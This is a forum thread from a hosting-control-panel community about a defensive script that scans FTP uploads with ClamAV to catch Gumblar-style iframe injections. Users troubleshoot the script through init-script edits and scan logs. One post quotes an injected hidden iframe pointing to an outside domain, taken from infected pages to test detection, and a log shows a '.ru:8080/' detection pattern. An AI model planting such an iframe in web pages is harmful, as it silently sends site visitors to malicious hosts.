SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

hidonet

Well-Known Member
Apr 29, 2005
55
0
156
Istanbul / Turkey
Thank you vinsar, I forgot to chmod php file and now that I did it is working. But still have strange problem on one server scripts allways find iframe script and block the attacker but does not change password for infected user. On the other server script does not allways find iframe script but do block IP and change pasword. The first server is cetnOS 4.7 other one is 5.2 both are same WHM/Cpanel version. Usualy on server where script does not always find iframe script after it finds infected file I have to kill pid of the ftp_clamscan.sh script and restart pure-ftpd and then it finds script again but after firs find it does not find anymore. Any idea why is that?
There is a problem on some servers. Pure FTP not returning username and blocking routine is not running because of that..

I tested this problem on vinsar's server and his server not returning username argument.

I'm updating the script... Coming very soon...
 

ThE EnD

Member
Aug 25, 2009
15
0
51
thanks for ur reply the

result of the command was
:
[email protected] [~]# ps aux | grep clam
root 3222 0.0 0.9 103128 74740 ? Ssl Aug15 1:41 /usr/sbin/clamd
root 20499 0.0 0.0 3916 676 pts/0 R+ 04:28 0:00 grep clam

and iam going to test uploading the page now
 

ThE EnD

Member
Aug 25, 2009
15
0
51
i have modified a html file and add the code in it
<iframe src="http://neglite.com/?click=ADB9A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
and upload it to one of my server sites

but no action
no email
not disconnected or bloked
not thing happen
 

mtindor

Well-Known Member
Sep 14, 2004
1,420
87
178
inside a catfish
cPanel Access Level
Root Administrator
i have modified a html file and add the code in it


and upload it to one of my server sites

but no action
no email
not disconnected or bloked
not thing happen
Are you sure that URL in that iframe is a known malicious URL that might somehow be in the database for ClamAV? Simply adding any old Iframe isn't going to do anything. It's not supposed to catch _all_ Iframes.

mike
 

isputra

Well-Known Member
May 3, 2003
574
0
166
Mbelitar
Use

chmod +x ftp_clamscan.sh
chmod +x ftp_clamscan.php

At command line, also see if an error_log file is generated in the same folder. If error_log is there check it out, see what message is in there.
Using above command and work like a charm
 

webicom

Well-Known Member
PartnerNOC
Mar 30, 2004
59
2
158
Slovenia
it seams the_end that your ftp_clamscan.sh script is not runing. If it would run on ps aux | grep clam you should get something like this
[[email protected] log]# ps aux | grep clam
root 3355 0.0 0.0 6256 644 pts/2 S+ 09:14 0:00 grep clam
root 5326 1.5 1.8 109892 75196 ? Ssl 08:48 0:24 /usr/sbin/clamd
root 5869 0.0 0.0 8680 256 ? Ss 08:50 0:00 /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh
[[email protected] log]#


this line is important and tels you that your script is runing root 5869 0.0 0.0 8680 256 ? Ss 08:50 0:00 /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh
 

mtindor

Well-Known Member
Sep 14, 2004
1,420
87
178
inside a catfish
cPanel Access Level
Root Administrator
iam sure as i have get that codes from already infected pages
Again, just because you know it's from and infected page, does that necessarily mean that ClamAV will pick it up? It's not exactly the best antivirus on the market, and even the best antivirus can't pick up the latest threats.

Mike
 

hidonet

Well-Known Member
Apr 29, 2005
55
0
156
Istanbul / Turkey
Important note !!

Do not restart FTP server with whm. Please restart with /etc/init.d/pure-ftpd restart command.

Upload script not working when you restart FTPd with WHM.
 

hidonet

Well-Known Member
Apr 29, 2005
55
0
156
Istanbul / Turkey
Script updated !!!

Release Changelog - 20090902
- ) ftp_clamscan.sh.sh file REMOVED. We don't need to ftp_clamscan.sh file anymore.
- ) Username finding mechanism fixed
- ) Kill IDLE connection function renewed
- ) Config file separated
- ) Log file located to /var/log/ftp_clamscan.log ( or wherever you want )
- ) Quarantine directory located to /quarantine/clamav/ ( or wherever you want )
- ) Some minor bugs fixed


Look at : Anti-Gumblar Protection Documentation
 

smksa

Member
Aug 1, 2006
21
0
151
Release Changelog - 20090902
- ) ftp_clamscan.sh.sh file REMOVED. We don't need to ftp_clamscan.sh file anymore.
- ) Username finding mechanism fixed
- ) Kill IDLE connection function renewed
- ) Config file separated
- ) Log file located to /var/log/ftp_clamscan.log ( or wherever you want )
- ) Quarantine directory located to /quarantine/clamav/ ( or wherever you want )
- ) Some minor bugs fixed


Look at : Anti-Gumblar Protection Documentation


May i know whether you have implement taking from backup for any overwrited file ?
 

isputra

Well-Known Member
May 3, 2003
574
0
166
Mbelitar
Release Changelog - 20090902
- ) ftp_clamscan.sh.sh file REMOVED. We don't need to ftp_clamscan.sh file anymore.
- ) Username finding mechanism fixed
- ) Kill IDLE connection function renewed
- ) Config file separated
- ) Log file located to /var/log/ftp_clamscan.log ( or wherever you want )
- ) Quarantine directory located to /quarantine/clamav/ ( or wherever you want )
- ) Some minor bugs fixed


Look at : Anti-Gumblar Protection Documentation
There are some bug :

1. IP does not listed in csf.deny after the file move to quarantine folder
2. User that do the attack does not kick off from FTP access after known by clamav as attacker, so hacker still can upload other files.

Other than that this script is working and i like it.
 

webicom

Well-Known Member
PartnerNOC
Mar 30, 2004
59
2
158
Slovenia
HI,

So, if I understand right, on current instalation I delete ftp_clamscan.sh and all I have to do is to overwite ftp_clamscan.php and upload ftp_clamscan_config.php and restart pure-ftp?

If so, may I ask what is calling ftp_clamsacan.php to work? Mybe my question is stupid but Im still learning.
 

isputra

Well-Known Member
May 3, 2003
574
0
166
Mbelitar
HI,

So, if I understand right, on current instalation I delete ftp_clamscan.sh and all I have to do is to overwite ftp_clamscan.php and upload ftp_clamscan_config.php and restart pure-ftp?

If so, may I ask what is calling ftp_clamsacan.php to work? Mybe my question is stupid but Im still learning.
You also have to edit /etc/init.d/pure-ftpd and change :
Code:
$DAEMONIZE /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh
to :

Code:
$DAEMONIZE /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.php
And you see that ftp_clamscan.php will be working by itself.
 

webicom

Well-Known Member
PartnerNOC
Mar 30, 2004
59
2
158
Slovenia
Yes of course, thanx Isputra. Mybe one qustion for all users. Do you also experiance from time to time that ftp uploads for customers get very slow? I do, but better that then viruses:)
 

isputra

Well-Known Member
May 3, 2003
574
0
166
Mbelitar
Yes of course, thanx Isputra. Mybe one qustion for all users. Do you also experiance from time to time that ftp uploads for customers get very slow? I do, but better that then viruses:)
Yes, a delay about 5-10 second per file before it finished.
 

hidonet

Well-Known Member
Apr 29, 2005
55
0
156
Istanbul / Turkey
There are some bug :

1. IP does not listed in csf.deny after the file move to quarantine folder
2. User that do the attack does not kick off from FTP access after known by clamav as attacker, so hacker still can upload other files.

Other than that this script is working and i like it.
I did a lot of tests.. This is the example log :

2009.09.02 06:12:18 --- init... File : /home/cube/test.html
2009.09.02 06:12:18 --- antivirus scan...
2009.09.02 06:12:19 --- word scan...
2009.09.02 06:12:19 --- /home/cube/test.html| Trojan.Iframe-9 |
2009.09.02 06:12:20 --- kill idle connection...
2009.09.02 06:12:20 --- kill -s 9 23714
2009.09.02 06:12:20 --- Killed process(es) : 23714
2009.09.02 06:12:20 --- block attacker ip...
2009.09.02 06:12:20 --- deny failed: 88.*.*.24 is in the allow file /etc/csf/csf.allow
2009.09.02 06:12:20 --- IP Blocked : 88.*.*.24
2009.09.02 06:12:20 --- send mail...
2009.09.02 06:12:20 --- end...

Do you see deny failed ? System running correctly but CSF. But returning this error because I've added my ip to allow list.

If your problem continues please pm me..
 

isputra

Well-Known Member
May 3, 2003
574
0
166
Mbelitar
And this is what i have in my log :

2009.09.02 14:21:09 --- ANTI GUMBLAR ( FTP CLAMSCAN ) LOG START
2009.09.02 14:21:09 --- init... File : /home/test/public_html/if-rame.html
2009.09.02 14:21:09 --- antivirus scan...
2009.09.02 14:21:09 --- word scan...
2009.09.02 14:21:09 --- wordscan results : .ru:8080/ at line 1 FOUND and file moved to File moved to : /quarantine/clamav//if-rame.html.20090902142109
2009.09.02 14:21:09 --- /home/test/public_html/if-rame.html|.ru:8080/ at line 1|
2009.09.02 14:21:09 --- pass change for user :
2009.09.02 14:21:11 --- kill idle connection...
2009.09.02 14:21:11 --- IDLE Process not found...
2009.09.02 14:21:11 --- block attacker ip...
2009.09.02 14:21:11 --- send mail...
2009.09.02 14:21:11 --- end...

As you can see, the log is not the same as yours. Some log line is missing :
--- kill -s 9 XXXXX
--- Killed process(es) : XXXXX
--- IP Blocked : xx.xx.xx.xx

I am using the latest script.